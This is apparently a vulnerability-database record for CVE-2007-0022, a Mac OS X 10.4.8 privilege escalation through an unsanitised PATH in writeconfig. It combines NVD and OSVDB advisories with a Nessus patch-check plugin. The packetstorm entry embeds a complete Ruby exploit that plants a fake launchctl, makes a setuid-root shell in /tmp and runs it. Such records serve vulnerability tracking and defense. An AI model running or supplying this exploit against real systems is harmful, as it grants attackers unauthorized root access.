{"cve": [{"lastseen": "2021-02-02T05:31:20", "description": "Untrusted search path vulnerability in writeconfig in Apple Mac OS X 10.4.8 allows local users to gain privileges via a modified PATH that points to a malicious launchctl program.", "edition": 4, "cvss3": {}, "published": "2007-01-23T00:28:00", "title": "CVE-2007-0022", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0022"], "modified": "2017-07-29T01:29:00", "cpe": ["cpe:/o:apple:mac_os_x:10.4.8"], "id": "CVE-2007-0022", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0022", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.4.8:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2007-0022"], "description": "## Vulnerability Description\nMac OS X contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when 'writeconfig' fails to sanitize the PATH environment variable, allowing an attacker to direct the utility to point to a malicious launchctl executable. This flaw may lead to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nMac OS X contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when 'writeconfig' fails to sanitize the PATH environment variable, allowing an attacker to direct the utility to point to a malicious launchctl executable. This flaw may lead to a loss of integrity.\n## References:\nVendor Specific News/Changelog Entry: http://docs.info.apple.com/article.html?artnum=305391\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=305391)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=305445)\nSecurity Tracker: 1017941\n[Secunia Advisory ID:23793](https://secuniaresearch.flexerasoftware.com/advisories/23793/)\n[Secunia Advisory ID:24966](https://secuniaresearch.flexerasoftware.com/advisories/24966/)\nOther Advisory URL: http://lists.apple.com/archives/Security-announce/2007/Apr/msg00001.html\nOther Advisory URL: http://projects.info-pull.com/moab/MOAB-21-01-2007.html\nISS X-Force ID: 31677\nFrSIRT Advisory: ADV-2007-1470\nFrSIRT Advisory: ADV-2007-0074\n[CVE-2007-0022](https://vulners.com/cve/CVE-2007-0022)\nBugtraq ID: 22148\n", "edition": 1, "modified": "2007-01-21T10:48:45", "published": "2007-01-21T10:48:45", "href": "https://vulners.com/osvdb/OSVDB:31605", "id": "OSVDB:31605", "title": "Mac OS X /sbin/service Path Subversion Privilege Escalation", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:50", "description": "", "published": "2007-01-24T00:00:00", "type": "packetstorm", "title": "MOAB-21-01-2007.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0022"], "modified": "2007-01-24T00:00:00", "id": "PACKETSTORM:53873", "href": "https://packetstormsecurity.com/files/53873/MOAB-21-01-2007.rb.txt.html", "sourceData": "`#!/usr/bin/ruby \n# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com> \n# Lance M. Havok <lmh [at] info-pull.com> \n# All pwnage reserved. \n# \n# \"Exploit\" for MOAB-21-01-2007: OS X, making root shells easier each day. \n# \n \nSHELL_WRAP = 'int main() { system(\"/bin/sh -i\"); return 0; }' \nSHELL_PLANT = 'int main() { system(\"chown root: /tmp/shX; chmod 4755 /tmp/shX\"); return 0; }' \nPREFS_BINPATH = '/Applications/System\\ Preferences.app/Contents/MacOS/System\\ Preferences' \n \nCOMMAND_LINE = \"echo '#{SHELL_WRAP}' > /tmp/t.c &&\" + \n\"cc -o /tmp/shX /tmp/t.c &&\" + \n\"echo '#{SHELL_PLANT}' > /tmp/t.c &&\" + \n\"cc -o /tmp/launchctl /tmp/t.c &&\" + \n'export PATH=\"/tmp/:$PATH\" &&' + \n\"#{PREFS_BINPATH} &\" \n \ndef escalate() \nsystem COMMAND_LINE \nputs \"++ Click on Sharing and then click on Windows Sharing...\" \nsleep 30 # make sure you have \"time\" \nsystem \"/tmp/shX\" \nend \n \nescalate() \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/53873/MOAB-21-01-2007.rb.txt"}], "nessus": [{"lastseen": "2021-02-01T03:41:00", "description": "The remote host is running a version of Mac OS X 10.4 that does not have\nSecurity Update 2007-004 applied.\n\nThis update fixes security flaws in the following applications :\n\nAFP Client\nAirPort\nCarbonCore\ndiskdev_cmds\nfetchmail\nftpd\ngnutar\nHelp Viewer\nHID Family\nInstaller\nKerberos\nLibinfo\nLogin Window\nnetwork_cmds\nSMB\nSystem Configuration\nURLMount\nVideo Conference\nWebDAV", "edition": 25, "published": "2007-04-21T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2007-004)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0725", "CVE-2007-0735", "CVE-2007-0744", "CVE-2007-0724", "CVE-2007-0738", "CVE-2007-0747", "CVE-2007-0741", "CVE-2007-0736", "CVE-2006-5867", "CVE-2007-0957", "CVE-2007-0739", "CVE-2007-0732", "CVE-2007-0737", "CVE-2006-6652", "CVE-2007-0743", "CVE-2007-0746", "CVE-2007-0646", "CVE-2007-1216", "CVE-2007-0729", "CVE-2007-0742", "CVE-2007-0734", "CVE-2007-0022", "CVE-2006-0300", "CVE-2006-6143", "CVE-2007-0465"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2007-004.NASL", "href": "https://www.tenable.com/plugins/nessus/25081", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\nif (NASL_LEVEL < 3000) exit(0);\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(25081);\n script_version (\"1.22\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n \n script_cve_id(\"CVE-2006-0300\", \"CVE-2006-5867\", \"CVE-2006-6143\", \"CVE-2006-6652\", \"CVE-2007-0022\",\n \"CVE-2007-0465\", \"CVE-2007-0646\", \"CVE-2007-0724\", \"CVE-2007-0725\", \"CVE-2007-0729\",\n \"CVE-2007-0732\", \"CVE-2007-0734\", \"CVE-2007-0735\", \"CVE-2007-0736\", \"CVE-2007-0737\",\n \"CVE-2007-0738\", \"CVE-2007-0739\", \"CVE-2007-0741\", \"CVE-2007-0742\", \"CVE-2007-0743\",\n \"CVE-2007-0744\", \"CVE-2007-0746\", \"CVE-2007-0747\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_bugtraq_id(23569);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2007-004)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes a security\nissue.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.4 that does not have\nSecurity Update 2007-004 applied.\n\nThis update fixes security flaws in the following applications :\n\nAFP Client\nAirPort\nCarbonCore\ndiskdev_cmds\nfetchmail\nftpd\ngnutar\nHelp Viewer\nHID Family\nInstaller\nKerberos\nLibinfo\nLogin Window\nnetwork_cmds\nSMB\nSystem Configuration\nURLMount\nVideo Conference\nWebDAV\" );\n # http://web.archive.org/web/20071213053008/http://docs.info.apple.com/article.html?artnum=305391\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf3b0926\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2007-004 :\n\n# http://web.archive.org/web/20070423190224/http://www.apple.com/support/downloads/securityupdate2007004universal.html\nhttp://www.nessus.org/u?f44d0fd9\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 134, 264);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/04/21\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/19\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_summary(english:\"Check for the presence of Security Update 2007-004\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n#\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\n\n\nuname = get_kb_item(\"Host/uname\");\nif ( egrep(pattern:\"Darwin.* (7\\.[0-9]\\.|8\\.[0-9]\\.)\", string:uname) )\n{\n if (!egrep(pattern:\"^SecUpd(Srvr)?(2007-00[4-9]|200[89]-|20[1-9][0-9]-)\", string:packages))\n security_hole(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
